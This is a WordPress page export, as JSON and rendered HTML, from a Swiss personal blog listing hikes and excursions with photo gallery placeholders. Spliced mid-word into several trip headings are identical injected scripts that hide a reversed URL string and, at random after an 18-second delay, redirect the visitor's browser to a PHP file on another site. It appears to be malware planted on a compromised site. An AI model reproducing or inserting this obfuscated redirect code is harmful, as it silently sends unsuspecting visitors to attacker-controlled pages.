{"id":902,"date":"2011-05-20T12:46:26","date_gmt":"2011-05-20T11:46:26","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?page_id=902"},"modified":"2017-01-04T15:19:56","modified_gmt":"2017-01-04T14:19:56","slug":"switzerland-schweiz","status":"publish","type":"page","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/switzerland-schweiz","title":{"rendered":"Switzerland &#8211; Schweiz"},"content":{"rendered":"<p><\/p>\n<p>Jeppi\u00a0 Ferien und Ausfl\u00fcge in der Schweiz \ud83d\ude42<br \/>\nEin eindr\u00fccklicher Fleck Erde den wir hier haben. Geniesst die sch\u00f6nen Bilder<br \/>\nBilder k\u00f6nnen bestellt werden. Einfach ein Kommentar im Blog ausf\u00fcllen und Informationen hinterlegen.<\/p>\n<p>Viel Spass<\/p>\n<p><strong>Matterhorn, 5-Seen-Weg-Wanderung, Zermatt,<\/strong>\u00a013. Juli 2013<\/p>\nngg_shortcode_0_placeholder\n<p><strong><span style=\"font-size: medium;\">Suonenwanderung an der Visperi, Visp bis Brig,<\/span><\/strong> 6. Juli 2013<\/p>\nngg_shortcode_1_placeholder\n<p><strong><span style=\"font-size: medium;\">Bantiger, Fernsehturm<\/span><\/strong>, 25. Mai 2012<\/p>\nngg_shortcode_2_placeholder\n<p><strong><span style=\"font-size: medium;\">St. Petersinsel im Bielersee<\/span><\/strong>, 18. Mai 2012<\/p>\nngg_shortcode_3_placeholder\n<p><strong><span style=\"font-size: medium;\">Lichtspektakel &#8222;Rendez-vous Bundeshaus&#8220;<\/span><\/strong>, 26. November 2011<\/p>\nngg_shortcode_4_placeholder\n<p><strong><span style=\"font-size: medium;\">Flims mit Cassons und dem Gaumasee<\/span><\/strong>, 3. bis 5. Ok<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tober 2011<\/p>\nngg_shortcode_5_placeholder\n<p><strong><span style=\"font-size: medium;\">Lugano, Gandria und der Lago di Lugano<\/span><\/strong>, 10. bis 12. Ok<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tober 2011<\/p>\nngg_shortcode_6_placeholder\n<p><strong><span style=\"font-size: medium;\">Lugano und Monte San Salva<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tore<\/span><\/strong>, September 2010<\/p>\nngg_shortcode_7_placeholder\n<p><strong><span style=\"font-size: medium;\">Chutzenturm bei Wahlendorf<\/span><\/strong>, Juli 2010<\/p>\nngg_shortcode_8_placeholder\n<p><\/p>","protected":false},"excerpt":{"rendered":"<p>Jeppi\u00a0 Ferien und Ausfl\u00fcge in der Schweiz \ud83d\ude42 Ein eindr\u00fccklicher Fleck Erde den wir hier haben. Geniesst die sch\u00f6nen Bilder Bilder k\u00f6nnen bestellt werden. Einfach ein Kommentar im Blog ausf\u00fcllen und Informationen hinterlegen. Viel Spass Matterhorn, 5-Seen-Weg-Wanderung, Zermatt,\u00a013. Juli 2013 Suonenwanderung an der Visperi, Visp bis Brig, 6. Juli 2013 Bantiger, Fernsehturm, 25. Mai 2012&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":6,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/902"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=902"}],"version-history":[{"count":17,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/902\/revisions"}],"predecessor-version":[{"id":1893,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/902\/revisions\/1893"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=902"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<p></p>
<p>Jeppi  Ferien und Ausflüge in der Schweiz 🙂<br />
Ein eindrücklicher Fleck Erde den wir hier haben. Geniesst die schönen Bilder<br />
Bilder können bestellt werden. Einfach ein Kommentar im Blog ausfüllen und Informationen hinterlegen.</p>
<p>Viel Spass</p>
<p><strong>Matterhorn, 5-Seen-Weg-Wanderung, Zermatt,</strong> 13. Juli 2013</p>
ngg_shortcode_0_placeholder
<p><strong><span style="font-size: medium;">Suonenwanderung an der Visperi, Visp bis Brig,</span></strong> 6. Juli 2013</p>
ngg_shortcode_1_placeholder
<p><strong><span style="font-size: medium;">Bantiger, Fernsehturm</span></strong>, 25. Mai 2012</p>
ngg_shortcode_2_placeholder
<p><strong><span style="font-size: medium;">St. Petersinsel im Bielersee</span></strong>, 18. Mai 2012</p>
ngg_shortcode_3_placeholder
<p><strong><span style="font-size: medium;">Lichtspektakel &#8222;Rendez-vous Bundeshaus&#8220;</span></strong>, 26. November 2011</p>
ngg_shortcode_4_placeholder
<p><strong><span style="font-size: medium;">Flims mit Cassons und dem Gaumasee</span></strong>, 3. bis 5. Ok<script>$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tober 2011</p>
ngg_shortcode_5_placeholder
<p><strong><span style="font-size: medium;">Lugano, Gandria und der Lago di Lugano</span></strong>, 10. bis 12. Ok<script>$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tober 2011</p>
ngg_shortcode_6_placeholder
<p><strong><span style="font-size: medium;">Lugano und Monte San Salva<script>$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tore</span></strong>, September 2010</p>
ngg_shortcode_7_placeholder
<p><strong><span style="font-size: medium;">Chutzenturm bei Wahlendorf</span></strong>, Juli 2010</p>
ngg_shortcode_8_placeholder
<p></p>

<p>Jeppi  Ferien und Ausflüge in der Schweiz 🙂 Ein eindrücklicher Fleck Erde den wir hier haben. Geniesst die schönen Bilder Bilder können bestellt werden. Einfach ein Kommentar im Blog ausfüllen und Informationen hinterlegen. Viel Spass Matterhorn, 5-Seen-Weg-Wanderung, Zermatt, 13. Juli 2013 Suonenwanderung an der Visperi, Visp bis Brig, 6. Juli 2013 Bantiger, Fernsehturm, 25. Mai 2012&#8230;</p>
